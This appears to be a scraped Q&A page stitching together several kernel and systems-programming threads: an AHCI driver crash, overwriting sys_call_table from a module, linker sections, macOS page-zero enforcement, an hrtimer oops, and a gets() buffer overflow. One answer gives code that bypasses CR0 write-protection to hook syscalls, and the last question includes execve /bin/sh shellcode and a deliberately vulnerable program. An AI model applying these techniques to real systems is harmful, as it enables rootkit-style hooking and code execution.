I'm referencing this answer for crash help in analyzing this bit of code which caused problems. The context for everyone, I'm working a character driver, which will act as a pass through from user space directly to the hardware, for the ahci driver. I'm modifying the ahci driver accordingly for this purpose.
I'm starting small. I want to peek at the port registers for the HBA port 0 of the AHCI HBA on my VM. My character driver ioctl code:
switch (cmd) {
case AHCIP_GPORT_REG:
pPciDev = pci_get_device(0x8086, 0x2829, NULL);
if (pPciDev) {
/* This will set ret to the value that it needs to be. This
* is true of __put_user() too */
if ((ret = __get_user(off, (u32*)obj))) {
printk(KERN_INFO "unable to read from user space\n");
goto ioctl_quick_out;
}
reg = get_port_reg(&pPciDev->dev, off);
if ((ret = __put_user(reg, (u32*)obj)))
{
printk(KERN_INFO "Unable to write to user space\n");
}
pci_dev_put(pPciDev);
}
// This break wasn't in the code when it crashed
break;
default:
// POSIX compliance with this one (REF of LDD3)
ret = -ENOTTY;
}
The code from my modified version of ahci.c which this character driver calls into:
u32 get_port_reg(struct device *dev, u32 off)
{
struct Scsi_Host *shost = class_to_shost(dev);
struct ata_port *ap = ata_shost_to_port(shost);
void __iomem *port_mmio = ahci_port_base(ap);
return ioread32(port_mmio + off);
}
EXPORT_SYMBOL(get_port_reg);
The kernel oops that this caused, happened here:
PID: 3357 TASK: ffff88011c9b7500 CPU: 0 COMMAND: "peek"
#0 [ffff8800abfc79f0] machine_kexec at ffffffff8103b5bb
#1 [ffff8800abfc7a50] crash_kexec at ffffffff810c9852
#2 [ffff8800abfc7b20] oops_end at ffffffff8152e0f0
#3 [ffff8800abfc7b50] no_context at ffffffff8104c80b
#4 [ffff8800abfc7ba0] __bad_area_nosemaphore at ffffffff8104ca95
#5 [ffff8800abfc7bf0] bad_area at ffffffff8104cbbe
#6 [ffff8800abfc7c20] __do_page_fault at ffffffff8104d36f
#7 [ffff8800abfc7d40] do_page_fault at ffffffff8153003e
#8 [ffff8800abfc7d70] page_fault at ffffffff8152d3f5
[exception RIP: get_port_reg+18]
RIP: ffffffffa03c4cd2 RSP: ffff8800abfc7e28 RFLAGS: 00010246
RAX: 0000000000020101 RBX: 00007fff17273960 RCX: ffffffff812b0710
RDX: ffff88011ddd5000 RSI: 0000000000000000 RDI: ffff88011ddd5090
RBP: ffff8800abfc7e28 R8: 0000000000000000 R9: 0000000000000000
R10: 00000000000007d5 R11: 0000000000000006 R12: ffff88011ddd5000
R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
ORIG_RAX: ffffffffffffffff CS: 0010 SS: 0018
As you can see, the instruction pointer was get_port_reg+18. Since this function is quite small, here's the full disassembly
crash> dis get_port_reg
0xffffffffa03c4cc0 <get_port_reg>: push %rbp
0xffffffffa03c4cc1 <get_port_reg+1>: mov %rsp,%rbp
0xffffffffa03c4cc4 <get_port_reg+4>: nopl 0x0(%rax,%rax,1)
0xffffffffa03c4cc9 <get_port_reg+9>: mov 0x240(%rdi),%rax
0xffffffffa03c4cd0 <get_port_reg+16>: mov %esi,%esi
0xffffffffa03c4cd2 <get_port_reg+18>: mov 0x2838(%rax),%rdx
0xffffffffa03c4cd9 <get_port_reg+25>: mov 0x28(%rax),%eax
0xffffffffa03c4cdc <get_port_reg+28>: mov 0x10(%rdx),%rdx
0xffffffffa03c4ce0 <get_port_reg+32>: shl $0x7,%eax
0xffffffffa03c4ce3 <get_port_reg+35>: mov %eax,%eax
0xffffffffa03c4ce5 <get_port_reg+37>: add 0x28(%rdx),%rax
0xffffffffa03c4ce9 <get_port_reg+41>: lea 0x100(%rax,%rsi,1),%rdi
0xffffffffa03c4cf1 <get_port_reg+49>: callq 0xffffffff8129dde0 <ioread32>
0xffffffffa03c4cf6 <get_port_reg+54>: leaveq
0xffffffffa03c4cf7 <get_port_reg+55>: retq
0xffffffffa03c4cf8 <get_port_reg+56>: nopl 0x0(%rax,%rax,1)
As you might have guessed, I'm something of an assembly neophyte. Which line of code would be get_port_reg+18? I'm puzzled because I'm calling functions on each line of that function but the only call I see is to ioread32().
For reference, I've modeled my function get_port_reg after ahci_show_port_cmd() within the same file. I could not think of any other means of getting the struct pci_dev structure necessary on which this is to operate. Am I making bad use of get_pci_device() and pci_dev_put()? Is this not the issue at all?
Thanks for any help
Andy
I am going to post my own answer. The two commentators of my question have put me onto the correct path for fixing this. As I mentioned, my approach was to do something which I'd seen done elsewhere in the ahci driver (ahci.c). Basically, the assumption was simple, this function in ahci.c required a struct device* and from that was able to get the ata_port information that was required. I'd seen, in ahci.c, that the author had done struct device* = &pdev->dev; occasionally. In other words, I figured that the dev member of struct pci_dev was getting me what I needed. I was apparently unaware of "class types" or something similar (see #myaut's first comment). #alexhoppus essentially draws the same/similar conclusion based on the code and disassembly which I posted.
The fix which I have employed, and which does work nicely, is as follows:
/* ioctl code in character driver */
switch (cmd) {
case AHCIP_GPORT_REG:
pPciDev = pci_get_device(0x8086, 0x2829, NULL);
if (pPciDev) {
struct ata_host *pHost = NULL;
struct ata_port *pPort = NULL;
printk(KERN_INFO "found the PCI device\n");
/* Get the devices driver data */
pHost = pci_get_drvdata(pPciDev);
if (!pHost) {
ret = -EFAULT;
goto ioctl_valid_pci_dev_out;
}
/* for this test, we'll use just port 0 */
pPort = pHost->ports[0];
if (!pPort) {
ret = -EFAULT;
goto ioctl_valid_pci_dev_out;
}
/* This will set ret to the value that it needs to be. This
* is true of __put_user() too */
if ((ret = __get_user(off, (u32*)obj))) {
printk(KERN_INFO "unable to read from user space\n");
goto ioctl_valid_pci_dev_out;
}
reg = get_port_reg(pPort, off);
if ((ret = __put_user(reg, (u32*)obj)))
{
printk(KERN_INFO "Unable to write to user space\n");
}
}
break;
default:
// POSIX compliance with this one (REF of LDD3)
ret = -ENOTTY;
}
The ahci driver was modified thusly as well
u32 get_port_reg(struct ata_port* pPort, u32 off)
{
void __iomem *port_mmio = ahci_port_base(pPort);
return ioread32(port_mmio + off);
}
EXPORT_SYMBOL(get_port_reg);
Though this has fixed the issue for me, I would really appreciate someone explaining to me what is placed in (struct pci_dev)device.dev.p->driver_data. I can use, and have, the Linux cross referencing tools to see the data types. What is supposed to be stored instruct device_private`? This is the structure which I'm now using to get the data I need. I'd truly appreciate someone commenting on this answer to explain that one.
Thanks to #myaut and #alexhoppus
Related
I am trying to add a syscall in a module. My rationale is:
This is for a research project, so the exact implementation does not matter.
Adding syscalls in the kernel-core takes a prohibitively long time to re-compile. I can suck up compiling once with an expanded syscall table, but not every time. Even with incremental compiling, linking and archiving the final binary takes a long time.
Since the project is timing sensitive, using kprobes to intercept the syscall handler would slow down the syscall handler.
I am still open to other means of adding a syscall, but for the above reasons, I think that writing to the sys_call_table in a module is the cleanest way to do what I am trying to do.
I've gotten the address of the syscall table from the System.map, disabled kaslr, and I am trying to clear the page protections, but some write-protection is still holding me back.
// following https://web.iiit.ac.in/~arjun.nath/random_notes/modifying_sys_call.html
// clear cr0 write protection
write_cr0 (read_cr0 () & (~ 0x10000));
// clear page write protection
sys_call_table_page = virt_to_page(&sys_call_table[__NR_execves]);
set_pages_rw(sys_call_table_page, 1);
// do write
sys_call_table[__NR_execves] = sys_execves;
However, I'm still getting a permission error, but I don't know the mechanism by which it is enforced:
[ 11.145647] ------------[ cut here ]------------
[ 11.148893] CR0 WP bit went missing!?
[ 11.151539] WARNING: CPU: 0 PID: 749 at arch/x86/kernel/cpu/common.c:386 native_write_cr0+0x3e/0x70
...
Here was a call trace pointing to the write of sys_call_table
...
[ 11.332825] ---[ end trace c20c95651874c08b ]---
[ 11.336056] CPA protect Rodata RO: 0xffff888002804000 - 0xffff888002804fff PFN 2804 req 8000000000000063 prevent 0000000000000002
[ 11.343934] CPA protect Rodata RO: 0xffffffff82804000 - 0xffffffff82804fff PFN 2804 req 8000000000000163 prevent 0000000000000002
[ 11.351720] BUG: unable to handle page fault for address: ffffffff828040e0
[ 11.356418] #PF: supervisor write access in kernel mode
[ 11.359908] #PF: error_code(0x0003) - permissions violation
[ 11.363665] PGD 3010067 P4D 3010067 PUD 3011063 PMD 31e29063 PTE 8000000002804161
[ 11.368701] Oops: 0003 [#1] SMP KASAN PTI
full dmesg
Any guesses on how to disable it?
There is a way that does not need to recompile the kernel. Since the kernel will detect whether the wp bit has been modified in write_cr0, you can provide a custom function to bypass it.
inline void mywrite_cr0(unsigned long cr0) {
asm volatile("mov %0,%%cr0" : "+r"(cr0), "+m"(__force_order));
}
Here is the function that enables/disables write protection. We use
mywrite_cr0 instead of write_cr0
void enable_write_protection(void) {
unsigned long cr0 = read_cr0();
set_bit(16, &cr0);
mywrite_cr0(cr0);
}
void disable_write_protection(void) {
unsigned long cr0 = read_cr0();
clear_bit(16, &cr0);
mywrite_cr0(cr0);
}
In your mod_init function, you can use kallsyms_lookup_name("sys_call_table") to figure out the address of sys_call_table at runtime, instead of compile time. Fortunately, we can now directly write to sys_call_table without dealing with pageattr.
The code below is tested on Linux Kernel 5.1.4
inline void mywrite_cr0(unsigned long cr0) {
asm volatile("mov %0,%%cr0" : "+r"(cr0), "+m"(__force_order));
}
void enable_write_protection(void) {
unsigned long cr0 = read_cr0();
set_bit(16, &cr0);
mywrite_cr0(cr0);
}
void disable_write_protection(void) {
unsigned long cr0 = read_cr0();
clear_bit(16, &cr0);
mywrite_cr0(cr0);
}
static struct {
void **sys_call_table;
void *orig_fn;
} tinfo;
static int __init mod_init(void) {
printk(KERN_INFO "Init syscall hook\n");
tinfo.sys_call_table = (void **)kallsyms_lookup_name("sys_call_table");
tinfo.orig_fn = tinfo.sys_call_table[your_syscall_num];
disable_write_protection();
// modify sys_call_table directly
tinfo.sys_call_table[your_syscall_num] = sys_yourcall;
enable_write_protection();
return 0;
}
static void __exit mod_cleanup(void) {
printk(KERN_INFO "Cleaning up syscall hook.\n");
// backup syscall
disable_write_protection();
tinfo.sys_call_table[your_syscall_num] = tinfo.orig_fn;
enable_write_protection();
printk(KERN_INFO "Cleaned up syscall hook.\n");
}
module_init(mod_init);
module_exit(mod_cleanup);
The kernel has code to protect against this sort of action.
First, the kernel by default does not allow you to remove write protection from the cr0 register. It checks that in arch/x86/kernel/cpu/common.c:native_write_cr0
if (static_branch_likely(&cr_pinning)) {
if (unlikely((val & X86_CR0_WP) != X86_CR0_WP)) {
bits_missing = X86_CR0_WP;
val |= bits_missing;
goto set_register;
}
/* Warn after we've set the missing bits. */
WARN_ONCE(bits_missing, "CR0 WP bit went missing!?\n");
}
Second, the page table does not allow you to set a page that should be read-only to read-write. It does that check arch/x86/mm/pageattr.c:static_protections
/* Check the PFN directly */
res = protect_rodata(pfn, pfn + npg - 1);
check_conflict(warnlvl, prot, res, start, end, pfn, "Rodata RO");
forbidden |= res;
If you disable these two checks by removing both blobs, the code to change the pagetable works.
It is possible to just remap the sys_call_table as read-write using the set_memory_rw function, so it's possible to write to it without disabling write protection for the whole kernel. Used this method myself on aarch64, not sure if it works on x86.
I want to put some functions in a specific section named ".xip.text",
but the read only data cannot put in that section.
The following is my test code:
#include <stdio.h>
void foo(void) __attribute__((section (".xip.text")));
void foo(void)
{
printf("hello world\n");
}
In the linker script file:
MEMORY
{
RAM (rwx) : ORIGIN = 0x00010000, LENGTH = 448K
FLASH (rx) : ORIGIN = 0x10000000, LENGTH = 1024K
}
SECTIONS
{
.xip :
{
*(.xip.text .xip.text.*)
*(.xip.rodata .xip.rodata.*)
} > FLASH
.text :
{
*(.text*)
} > RAM
}
After linking, the function text is placed in ".xip" section, but the string
"hello world\n" is not put in the same section. How to solve it?
I can put the whole file in the ".xip" section to solve this problem. But I
have many files, and I only want to put some functions to ".xip" section, not
the whole file.
In the map file, text of foo() is placed in the right section,
but string "hello world\n" (.rodata.str1.1) is placed in another seciton.
*(.xip.text .xip.text.*)
.xip.text 0x1002f7b0 0xc ../foo.o
0x1002f7b0 foo
*fill* 0x1002f7bc 0x4
.rodata.str1.1
0x00025515 0xc ../foo.o
*fill* 0x00025521 0x3
After disassemble,
1002f7b0 <foo>:
void foo(void) __attribute__((section (".xip.text")));
void foo(void)
{
printf("hello world\n");
1002f7b0: 4801 ldr r0, [pc, #4] ; (1002f7b8 <foo+0x8>)
1002f7b2: f000 b95d b.w 1002fa70 <__puts_veneer>
1002f7b6: bf00 nop
1002f7b8: 00025515 .word 0x00025515
1002f7bc: 00000000 .word 0x00000000
gcc version: gcc-arm-none-eabi-7-2017-q4-major, gcc version 7.2.1 20170904 (release) [ARM/embedded-7-branch revision 255204] (GNU Tools for Arm Embedded Processors 7-2017-q4-major)
function text is placed in ".xip" section, but the string "hello world\n" is not put in the same section.
The read-only data is not .text, so it shouldn't be put into the same section.
If you want to control which section the read-only data goes, you need to do that yourself. Something like this should work:
__attribute__((section(".xip.rodata")))
const char my_xip_data[] = "hello, world\n";
void foo(void)
{
printf(my_xip_data);
}
For over a year now, I've been using XCode 4.5 to build an app using the OS X 10.7 sdk, with target deployment to 10.6.
The app runs perfectly well on 10.6, 10.7, 10.8, and 10.9. But when I run it on 10.10, I get a message in the Console saying "Cannot enforce a hard page-zero" for the app.
Googling "Cannot enforce a hard page-zero" returns nothing helpful.
Does anyone have any idea what this means?
One useful bit of information is that building the app with XCode 5 doesn't result in the problem, so I'm thinking it has something to do with the older XCode 4.5.
I'd rather stick with the older XCode if it's a simple fix, since I'm hesitant to move to XCode 5 if I don't have to.
Any insights very much appreciated.
EDIT 1: I discovered that opening the app in 32-bit mode works on Yosemite. So it's only 64-bit mode that has the problem.
EDIT 2: here is the output of otool as requested by Ken:
Load command 0
cmd LC_SEGMENT_64
cmdsize 72
segname __TEXT
vmaddr 0x00000001007f9000
vmsize 0x0000000000225dba
fileoff 0
filesize 2251422
maxprot rwx
initprot rwx
nsects 0
flags (none)
Load command 1
cmd LC_UNIXTHREAD
cmdsize 184
flavor x86_THREAD_STATE64
count x86_THREAD_STATE64_COUNT
rax 0x0000000000000000 rbx 0x0000000000000000 rcx 0x0000000000000000
rdx 0x0000000000000000 rdi 0x0000000000000000 rsi 0x0000000000000000
rbp 0x0000000000000000 rsp 0x0000000000000000 r8 0x0000000000000000
r9 0x0000000000000000 r10 0x0000000000000000 r11 0x0000000000000000
r12 0x0000000000000000 r13 0x0000000000000000 r14 0x0000000000000000
r15 0x0000000000000000 rip 0x0000000100a1e3d8
rflags 0x0000000000000000 cs 0x0000000000000000 fs 0x0000000000000000
gs 0x0000000000000000
Apple's kernel (xnu) from OS X 10.10 now enforces a 'hard page-zero' where in past this was not the case. Note this requirement is only for 64 bit MachO executables.
The issue would be resolved for your application by ensuring there is a __PAGEZERO segment. Importantly, this __PAGEZERO segment must have a vmaddr of 0x0 (NULL) and a vmsize of at least 0x1000. The specific name '__PAGEZERO' for the segment is not actually required, but most compilers will use it in this manner.
A hard (limited privileges) PAGEZERO makes NULL deference software vulnerabilities harder to exploit.
The following code snippets from the xnu source code explains:
// From xnu-2782.1.97/bsd/kern/mach_loader.c
load_return_t
load_machfile(
struct image_params *imgp,
struct mach_header *header,
thread_t thread,
vm_map_t new_map,
load_result_t *result
)
{
...
boolean_t enforce_hard_pagezero = TRUE;
...
// Second vm_map_create() argument sets map->min_offset to zero.
map = vm_map_create(pmap,
0,
vm_compute_max_offset((imgp->ip_flags & IMGPF_IS_64BIT)),
TRUE);
...
#if __x86_64__
/*
* On x86, for compatibility, don't enforce the hard page-zero restriction for 32-bit binaries.
*/
if ((imgp->ip_flags & IMGPF_IS_64BIT) == 0) {
enforce_hard_pagezero = FALSE;
}
#endif
/*
* Check to see if the page zero is enforced by the map->min_offset.
*/
// Note: vm_map_has_hard_pagezero(map, 0x1000) checks if map->min_offset >= 0x1000
// Refer xnu-2782.1.97/osfmk/vm/vm_map.c
if (enforce_hard_pagezero && (vm_map_has_hard_pagezero(map, 0x1000) == FALSE)) {
if (create_map) {
vm_map_deallocate(map); /* will lose pmap reference too */
}
printf("Cannot enforce a hard page-zero for %s\n", imgp->ip_strings);
return (LOAD_BADMACHO);
}
The raising of map->min_offset above zero happens in the segment loading code:
// From xnu-2782.1.97/bsd/kern/mach_loader.c
static
load_return_t
load_segment(
struct load_command *lcp,
uint32_t filetype,
void * control,
off_t pager_offset,
off_t macho_size,
struct vnode *vp,
vm_map_t map,
int64_t slide,
load_result_t *result
)
{
...
/*
* Round sizes to page size.
*/
seg_size = round_page_64(scp->vmsize);
map_size = round_page_64(scp->filesize);
map_addr = trunc_page_64(scp->vmaddr); /* JVXXX note that in XNU TOT this is round instead of trunc for 64 bits */
seg_size = vm_map_round_page(seg_size, vm_map_page_mask(map));
map_size = vm_map_round_page(map_size, vm_map_page_mask(map));
...
// This if test is key, checking for a 0x0 vmaddr, vmsize, and initprot and maxprot
// memory protections.
// Note a segment name of "__PAGEZERO" is not actually required.
if (map_addr == 0 &&
map_size == 0 &&
seg_size != 0 &&
(scp->initprot & VM_PROT_ALL) == VM_PROT_NONE &&
(scp->maxprot & VM_PROT_ALL) == VM_PROT_NONE) {
/*
* For PIE, extend page zero rather than moving it. Extending
* page zero keeps early allocations from falling predictably
* between the end of page zero and the beginning of the first
* slid segment.
*/
seg_size += slide;
slide = 0;
/*
* This is a "page zero" segment: it starts at address 0,
* is not mapped from the binary file and is not accessible.
* User-space should never be able to access that memory, so
* make it completely off limits by raising the VM map's
* minimum offset.
*/
ret = vm_map_raise_min_offset(map, seg_size);
// From xnu-2782.1.97/osfmk/vm/vm_map.c
/*
* Raise a VM map's minimum offset.
* To strictly enforce "page zero" reservation.
*/
kern_return_t
vm_map_raise_min_offset(
vm_map_t map,
vm_map_offset_t new_min_offset)
{
...
}
As to why your older Xcode 4.x does not set this up, it seems quite odd -- perhaps there is a project file setting, but the version of the clang compiler and linker which come with newer Xcode 5 (nay even Xcode 6) should more closely reflect the requirements of the modern OS X 10.10 kernel.
Note: There was a form of hard page-zero enforcement in earlier iOS releases, but not previously in OS X.
Valgrind, the tool suite which provides a number of debugging and profiling tools that help you make your programs faster and more correct, is also experiencing a related issue with this new OS X 10.10 kernel requirement: https://bugs.kde.org/show_bug.cgi?id=339045
I have encountered a very similar problem. otool -lV shows a similar segment structure. What I found out was that the issue was actually caused by executable packing using UPX (3.08). If you have applied UPX to your binary, run upx -d to decompress the binary and try running it on Yosemite again. The related discussions for my issue was described in a bug report I just filed:
https://sourceforge.net/p/upx/bugs/238/
Please help me to solve this Oops. I use a 1 milli sec high resolution timer and installing it as a seperate module with "insmod". This fires every 1 ms and i have to do some task with this timer interrupt. There are other processes which does image transfer and i see ethernet driver interrupt appearing to send the image. This enet interrupt is having some high priority and looks like it is delaying the 1 ms timer interrupt above, but i am not sure.
I see the below Oops after running test for 3 to 3 hours. How to root cause this ?
please help.
The system is ARM omap, running Linux 2.6.33 cross compiled.
[root#user:/]#
Unable to handle kernel paging request at virtual address 7eb52754
pgd = 80004000
[7eb52754] *pgd=00000000
Internal error: Oops: 80000005 [#1] PREEMPT
last sysfs file: /sys/devices/virtual/spi/spi/dev
Modules linked in: mod timermod mod2(P) mod3(P) mod4
CPU: 0 Tainted: P (2.6.33_appl #1)
PC is at 0x7eb52754
LR is at walk_stackframe+0x24/0x40
pc : [<7eb52754>] lr : [<8002d4dc>] psr: a0000013
sp : 80395f10 ip : 80395f30 fp : 80395f2c
r10: 0000001f r9 : 00000000 r8 : 87a25200
r7 : 878b0380 r6 : 80395f40 r5 : 80028374 r4 : 80395f30
r3 : 80000100 r2 : 80395f40 r1 : 80395f40 r0 : 80395f30
Flags: NzCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment kernel
Control: 10c5387d Table: 86fb0019 DAC: 00000017
Process swapper (pid: 0, stack limit = 0x803942e8)
Stack: (0x80395f10 to 0x80396000)
5f00: 8002bfa4 00000001 802c678c 87a25380
5f20: 80395f54 80395f30 8002bfe0 8002d4c4 80395f54 80395f30 8004998c 8002bfa4
5f40: 00000002 00000002 80395f6c 80395f58 8004998c 8002bfb0 80396ea8 80394000
5f60: 80395fa4 80395f70 802c678c 800498d0 8002b320 80023218 80398408 80021e10
5f80: 80394000 8002321c 80023218 80398408 80021e10 413fc082 80395fbc 80395fa8
5fa0: 8002b324 802c62fc 803f4cc8 803f5190 80395fcc 80395fc0 802c3ee4 8002b28c
5fc0: 80395ff4 80395fd0 8000897c 802c3e6c 800084fc 00000000 00000000 8002321c
5fe0: 10c53c7d 803c7630 00000000 80395ff8 80008034 80008754 00000000 00000000
Backtrace:
[<8002d4b8>] (walk_stackframe+0x0/0x40) from [<8002bfe0>] (return_address+0x3c/0x5c)
r6:87a25380 r5:802c678c r4:00000001 r3:8002bfa4
[<8002bfa4>] (return_address+0x0/0x5c) from [<8004998c>] (sub_preempt_count+0xc8/0xfc)
[<800498c4>] (sub_preempt_count+0x0/0xfc) from [<802c678c>] (schedule+0x49c/0x4d8)
r5:80394000 r4:80396ea8
[<802c62f0>] (schedule+0x0/0x4d8) from [<8002b324>] (cpu_idle+0xa4/0xbc)
r9:413fc082 r8:80021e10 r7:80398408 r6:80023218 r5:8002321c
r4:80394000
[<8002b280>] (cpu_idle+0x0/0xbc) from [<802c3ee4>] (rest_init+0x84/0xa0)
r4:803f5190 r3:803f4cc8
[<802c3e60>] (rest_init+0x0/0xa0) from [<8000897c>] (start_kernel+0x234/0x284)
[<80008748>] (start_kernel+0x0/0x284) from [<80008034>] (__enable_mmu+0x0/0x2c)
Code: bad PC value
---[ end trace 7e26218fd59f68a5 ]---
Kernel panic - not syncing: Attempted to kill the idle task!
Backtrace:
[<8002db2c>] (dump_backtrace+0x0/0x114) from [<802c610c>] (dump_stack+0x20/0x24)
r6:fffffffc r5:0000000b r4:803c8518 r3:00000002
[<802c60ec>] (dump_stack+0x0/0x24) from [<802c6168>] (panic+0x58/0x130)
[<802c6110>] (panic+0x0/0x130) from [<80057330>] (do_exit+0x7c/0x6e0)
r3:80394000 r2:00000000 r1:80395d28 r0:80348e90
[<800572b4>] (do_exit+0x0/0x6e0) from [<8002dfc0>] (die+0x290/0x2c4)
r7:7eb52744
[<8002dd30>] (die+0x0/0x2c4) from [<8002f4d4>] (__do_kernel_fault+0x74/0x84)
r7:80395ec8
[<8002f460>] (__do_kernel_fault+0x0/0x84) from [<8002f6bc>] (do_page_fault+0x1d8/0x1f0)
r7:00000000 r6:80395ec8 r5:7eb52754 r4:80396ea8
[<8002f4e4>] (do_page_fault+0x0/0x1f0) from [<8002f794>] (do_translation_fault+0x20/0x80)
[<8002f774>] (do_translation_fault+0x0/0x80) from [<80029250>] (do_PrefetchAbort+0x44/0xa8)
r6:7eb52754 r5:80398820 r4:00000005 r3:8002f774
[<8002920c>] (do_PrefetchAbort+0x0/0xa8) from [<80029d1c>] (__pabt_svc+0x5c/0xa0)
Exception stack(0x80395ec8 to 0x80395f10)
5ec0: 80395f30 80395f40 80395f40 80000100 80395f30 80028374
5ee0: 80395f40 878b0380 87a25200 00000000 0000001f 80395f2c 80395f30 80395f10
5f00: 8002d4dc 7eb52754 a0000013 ffffffff
r7:878b0380 r6:80395f40 r5:80395efc r4:ffffffff
[<8002d4b8>] (walk_stackframe+0x0/0x40) from [<8002bfe0>] (return_address+0x3c/0x5c)
r6:87a25380 r5:802c678c r4:00000001 r3:8002bfa4
[<8002bfa4>] (return_address+0x0/0x5c) from [<8004998c>] (sub_preempt_count+0xc8/0xfc)
[<800498c4>] (sub_preempt_count+0x0/0xfc) from [<802c678c>] (schedule+0x49c/0x4d8)
r5:80394000 r4:80396ea8
[<802c62f0>] (schedule+0x0/0x4d8) from [<8002b324>] (cpu_idle+0xa4/0xbc)
r9:413fc082 r8:80021e10 r7:80398408 r6:80023218 r5:8002321c
r4:80394000
[<8002b280>] (cpu_idle+0x0/0xbc) from [<802c3ee4>] (rest_init+0x84/0xa0)
r4:803f5190 r3:803f4cc8
[<802c3e60>] (rest_init+0x0/0xa0) from [<8000897c>] (start_kernel+0x234/0x284)
[<80008748>] (start_kernel+0x0/0x284) from [<80008034>] (__enable_mmu+0x0/0x2c)
=========================================
#include <linux/hrtimer.h>
#include <linux/module.h>
#include <linux/ktime.h>
#include <linux/kdev_t.h>
#include <linux/cdev.h>
#include <linux/device.h>
#include <linux/fs.h>
#include <linux/wait.h>
#include <linux/sched.h>
#define FIRST_MINOR 0
#define MINOR_CNT 1
static struct class *cl;
static struct cdev cdev;
static dev_t dev;
static u8 timer_expired = 0;
static wait_queue_head_t wq_head;
static struct hrtimer timer;
static ssize_t hr_read(struct file *f, char * __user buff, size_t cnt, loff_t *off)
{
wait_event_interruptible(wq_head, timer_expired);
timer_expired = 0;
return 0;
}
static int hr_open(struct inode *i, struct file *f)
{
ktime_t ktime;
ktime.tv64 = 1E6L;
hrtimer_start(&timer, ktime, HRTIMER_MODE_REL);
return 0;
}
static int hr_close(struct inode *i, struct file *f)
{
if (hrtimer_cancel(&timer))
printk(KERN_INFO "timercancelled\n");
return 0;
}
static struct file_operations hr_fops = {
.read = hr_read,
.open = hr_open,
.release = hr_close
};
static enum hrtimer_restart timer_callback(struct hrtimer *timer)
{
ktime_t ktime;
u64 overrun;
ktime.tv64 = 1E6L;
//printk("KERN_INFO""Timer Expired");
overrun = hrtimer_forward_now(timer, ktime);
timer_expired = 1;
wake_up_interruptible(&wq_head);
return HRTIMER_RESTART;
}
#if 1
static int init_hrtimer(void)
{
ktime_t ktime;
unsigned long delay_in_ms = 500L;
printk(KERN_ERR "Timer being set up\n");
ktime = ktime_set(0,delay_in_ms*1E6L);
hrtimer_init(&timer, CLOCK_MONOTONIC, HRTIMER_MODE_REL);
timer.function = &timer_callback;
printk(KERN_ERR "Timer starting to fire\n");
printk(KERN_ERR "in %ldms %ld\n", delay_in_ms, jiffies);
if (alloc_chrdev_region(&dev, FIRST_MINOR, MINOR_CNT, "Hr Timer") < 0)
{
return -1;
}
printk("Major Nr: %d\n", MAJOR(dev));
cdev_init(&cdev, &hr_fops);
if (cdev_add(&cdev, dev, MINOR_CNT) == -1)
{
unregister_chrdev_region(dev, MINOR_CNT);
return -1;
}
if ((cl = class_create(THIS_MODULE, "hrtimer")) == NULL)
{
cdev_del(&cdev);
unregister_chrdev_region(dev, MINOR_CNT);
return -1;
}
if (IS_ERR(device_create(cl, NULL, dev, NULL, "hrt%d", 0)))
{
class_destroy(cl);
cdev_del(&cdev);
unregister_chrdev_region(dev, MINOR_CNT);
return -1;
}
init_waitqueue_head(&wq_head);
return 0;
}
#endif
static void clean_hrtimer(void)
{
int cancelled = hrtimer_cancel(&timer);
if (cancelled)
printk(KERN_ERR "Timer still running\n");
else
printk(KERN_ERR "Timer cancelled\n");
device_destroy(cl, dev);
class_destroy(cl);
cdev_del(&cdev);
unregister_chrdev_region(dev, MINOR_CNT);
}
module_init(init_hrtimer);
module_exit(clean_hrtimer);
MODULE_LICENSE("GPL");
========================
I use the above code as a driver module and insert it with insmod. I expect this to fire every 1 ms and it works fine but once in a while when ehernet traffic is too high, it gives a kernel Oops as explained. Please check if the code is having any issues in it or not?
I checked the lsmod, and i see that all the 5 kernel modules (my own) are loaded between: 0x7f000000 to 0x7f02xxxx
mod at 0x7f020xxxx,
timermod at 0x7f01xxx,
mod2 at 0x7f01xxxx,
mod3 at 0x7f00xxxx,
mod4 at 0x7f000000.
There is no module loaded at oops address 0x7eb52754. I checked from /proc/kallsyms file to
verify this. How to check the mapping of 0x7eb5xxxx in to the source file? Where else can i get the data for this on system.
According to the error message, the code that caused this kernel panic resides at virtual address 0x7eb52754. Judging from the address (just below 0x8000000), I'm guessing this is the code segment of a kernel module - probably one of your own kernel modules.
To do a root cause analyses, load your (and all other) kernel modules in the same order as they were loaded when this panic occurred and observe their load address as printed by lsmod (or cat /proc/modules which is almost the same).
Using their code size and load address, calculate which module text segment resides at virtual address 0x7eb52754. The subtract 0x7eb52754 from the module load address.
What you will get is the offset into the module binary of the instruction that caused the panic.
Now use objdump on the kernel module binary and look for that offset, and check to which function it belong (this can also be done with add2line, if you have that too). This should point you to the function and even line number (if you have debug information) of the instruction that caused this panic.
good luck.
I'm trying to overflow buffer with my shellcode and I have a problems with gets().
If I overflow buffer with shellcode using strcpy() function - it's OK and I got a /bin/bash. But if I do the same with gets() function it shows me nothing. I tried ret2text attack with gets() and it works fine, bun if I try overflow with malicious code(shell) it doesn't work.
I turned off stack-protector (-fno-stack-protector), disabled ASLR (echo 0 > randomize_va_space), enabled stack execution (-z execstack)
here is shellcode
xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68
here is vuln prog
#include <stdio.h>
#include <string.h>
int ask_user(void)
{
int ret;
char name[10];
printf("Your Name: ");
fflush(stdout);
gets(name);
ret = strcmp(name, "Peter");
if (ret == 0)
return 1;
return 0;
}
int main(int argc, char *argv[])
{
int is_peter;
printf("This Application finds the Peter!\n");
is_peter = ask_user();
if (is_peter == 1)
{
printf("Lol, you are a real Peter!\n");
return 0;
}
printf("Ups, no Peter :-/\n");
return 0;
}
some gdb
gdb$ si
--------------------------------------------------------------------------[regs]
EAX: 0x0000000B EBX: 0xBFFFEF22 ECX: 0x00000000 EDX: 0x00000000 o d I t s Z a P c
ESI: 0x00000000 EDI: 0x00000000 EBP: 0x41414141 ESP: 0xBFFFEF10 EIP: 0xBFFFEF1B
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
--------------------------------------------------------------------------[code]
=> 0xbfffef1b: int 0x80
0xbfffef1d: call 0xbfffef12
0xbfffef22: das
0xbfffef23: bound ebp,QWORD PTR [ecx+0x6e]
0xbfffef26: das
0xbfffef27: jae 0xbfffef91
0xbfffef29: add BYTE PTR [eax+ecx*1],al
0xbfffef2c: add BYTE PTR [eax],al
--------------------------------------------------------------------------------
0xbfffef1b in ?? ()
gdb$ x/1sb $ebx
0xbfffef22: "/bin/sh"
gdb$ x/1sb $esp
